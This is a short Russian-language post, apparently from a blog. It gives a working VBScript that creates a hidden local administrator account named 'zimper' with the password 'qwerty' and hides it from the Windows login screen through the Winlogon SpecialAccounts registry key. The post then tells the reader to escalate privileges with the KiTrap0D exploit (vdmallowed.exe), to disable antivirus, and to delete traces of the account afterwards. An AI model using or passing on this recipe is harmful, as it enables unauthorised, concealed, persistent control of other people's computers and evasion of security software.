Set s=CreateObject("WScript.Shell")
s.run"C:\windows\system32\net.exe user zimper qwerty /add", True
s.run"C:\windows\system32\net.exe localgroup Администраторы zimper /add", True
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.GetFile(WScript.ScriptFullName)
s.RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\MIcrosoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\zimper<=(<имя пользователя>)",0,"REG_DWORD"
Сохраняем в файле например: admin.vbs
Далее, чтобы он выполнился без ошибок, необходимо иметь права админа в консоли.
Для их получения можно воспользоваться глобальной уязвимостью всех оконных систем через метасплоит kitrap0d. Скачиваем сплоит, далее из консоли запускаем файл vdmallowed.exe. Его запуск могут пытаться блокировать анитвирусы, поэтому, по возможности, лучше все отключить. После запуска vdmallowed.exe с правами администратора запускаем файл admin.vbs. Все, теперь новый администратор с ником zimper и паролем qwerty должен быть добавлен.
Перезагружаемся и заходим под админом.
Чтобы удалить следы учетной записи, нужно будет удалить папку пользователя zimper (из консоли это - rmdir с:/Documents and Settings/zimper /s), а также из реестра запись
HKEY_LOCAL_MACHINE\SOFTWARE\MIcrosoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\zimper<=(<имя пользователя>)
Комментариев нет:
Отправить комментарий